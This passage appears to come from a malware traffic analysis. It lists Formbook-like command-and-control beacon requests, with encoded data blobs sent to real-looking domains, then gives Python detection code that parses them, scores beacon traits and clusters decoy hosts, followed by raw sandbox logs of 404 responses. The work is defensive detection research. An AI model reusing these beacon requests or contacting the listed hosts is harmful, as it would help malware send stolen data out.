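    ("GET", "www.43kdd.top", "/p3j6/?bV=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPKWG5WAS3psYmnqJIK+9TxAzVw33X+qLRjr2nQR0/ahQ8dw==&wzcP=iLdd", None),
    ("GET", "www.jcsa.info", "/hxi5/?bV=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzECOhz/eBMNQtzbXvy0GcsSmUnEXx6wmc7on4m5IV1LddeYQ==&wzcP=iLdd", None),
    ("GET", "www.1secondlending.one", "/j8pv/?bV=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b7jwAWfgjYo1ceHXmQsmagjo2PVHkyEcMWf8OCye8gCuDoA==&wzcP=iLdd", None),
    ("GET", "www.zkdamdjj.shop", "/swhs/?bV=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTQ0tlUhCAXdO2W2lcbMXoQ37jkanwSyGhs5UT/ITwg7la8g==&wzcP=iLdd", None),
    ("GET", "www.rgenerousrs.store", "/8gp4/?bV=FEeZWlhMd48ysDs290a5kdk4wKu/Usks8a8x1+EEc0Vq+hoQB7y77HQo5oow9pdvGKqyyoz5OAo+pUm014OHEU2GNEJ4iSl/EJTCwnsfNhVKTNH/IB8Mre+zSk1Y9E9ALA==&wzcP=iLdd", None),
    ("POST", "www.optimismbank.xyz", "/98j3/", "bV=uqdCK+O/4KmQZtxue5WmiHUY1uS+G1oJbo5/T2OZF/zHXlcKAdERIjPJubFaeNnd0Yyd4WyvHbOBbYdydfLEPIbkTKNROTovuYhuJAIu1Z0YH7gBXcCBBOaI4gk2Gb4vH3l6QFMgAbfCXUnEZ15Qt9kQn+HpoBwMpHwYFfD02mnKQ3rv2WjGwYEhRC810JiJJ0QrHXM="),
]

# Constructed benign control request (not from the report) for comparison.
BENIGN_REQUEST = (b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
                  b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/120.0\r\n"
                  b"Accept: text/html\r\nConnection: keep-alive\r\n\r\n")

PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")             # /fev0/, /98j3/, ...
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")  # long base64-looking value


def build_raw_request(method, host, target, body=None):
    """Rebuild the wire form of a report row; the report flattens the CRLFs away."""
    lines = [f"{method} {target} HTTP/1.1", "Accept-Language: en-US", "Connection: close",
             f"Host: {host}", f"User-Agent: {REPORT_UA}"]
    if body is not None:  # the POST row also carries a form body and same-site Origin/Referer
        lines += ["Content-Type: application/x-www-form-urlencoded", f"Content-Length: {len(body)}",
                  f"Origin: http://{host}", f"Referer: http://{host}{target}"]
    return ("\r\n".join(lines) + "\r\n\r\n" + (body or "")).encode()


def split_form(encoded):
    """Split k=v&k=v WITHOUT decoding: the blobs carry '+' and '/' literally."""
    pairs = []
    for item in encoded.split("&"):
        if item:
            key, _, value = item.partition("=")
            pairs.append((key, value))
    return pairs


def parse_raw_request(raw):
    """Minimal HTTP/1.1 request parser: request line, headers, form parameters."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    params = split_form(parts.query)
    if method == "POST" and headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params += split_form(body.decode("latin-1"))
    return {"method": method, "path": parts.path, "params": params, "headers": headers}


def is_short_id(key, value):
    return len(key) <= 4 and 1 <= len(value) <= 8 and value.isalnum()


def beacon_indicators(req):
    """Traits every C2 request in the report shares; any one alone is weak evidence."""
    hits = []
    if PATH_RE.match(req["path"]):
        hits.append("four-character directory path")
    has_blob = any(BLOB_RE.match(v) for _, v in req["params"])
    if has_blob:
        hits.append("long base64-looking parameter")
    if has_blob and any(is_short_id(k, v) for k, v in req["params"]):
        hits.append("short fixed id parameter beside the blob")
    if req["headers"].get("user-agent") == REPORT_UA:
        hits.append("fixed Chrome/35 on Windows 7 User-Agent")
    if req["headers"].get("connection", "").lower() == "close":
        hits.append("Connection: close")
    return hits


def is_formbook_like(req, min_hits=3):
    return len(beacon_indicators(req)) >= min_hits


def decoy_clusters(reqs):
    """Hosts grouped by identical short id: one id across many hosts = decoy rotation."""
    clusters = defaultdict(set)
    for req in reqs:
        for key, value in req["params"]:
            if is_short_id(key, value):
                clusters[(key, value)].add(req["headers"].get("host", ""))
    return clusters


def analyze(rows):
    """Parse the report rows and summarise what a detection would report."""
    reqs = [parse_raw_request(build_raw_request(*row)) for row in rows]
    clusters = decoy_clusters(reqs)
    key, hosts = max(clusters.items(), key=lambda kv: len(kv[1])) if clusters else (None, set())
    return {"total": len(reqs), "flagged": sum(is_formbook_like(r) for r in reqs),
            "largest_cluster": key, "cluster_hosts": sorted(hosts)}
```

Run as a script (`print(analyze(REPORT_REQUESTS))`) it reports all 14 requests flagged and a single cluster, wzcP=iLdd, spanning 13 hosts. In a real pipeline the cluster step is the part worth keeping: a lone four-character path or an old Chrome build is noise, but one constant parameter value hitting a dozen freshly registered hosts inside a minute from one process is the pattern the Suricata alert and the "DNS queries to domains with low reputation" signature in this report are both reacting to.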
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 02 Dec 2024 14:23:39 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 
30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 14:24:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 14:24:14 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 14:24:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 14:24:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 02 Dec 2024 14:24:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 02 Dec 2024 14:24:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 02 Dec 2024 14:24:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
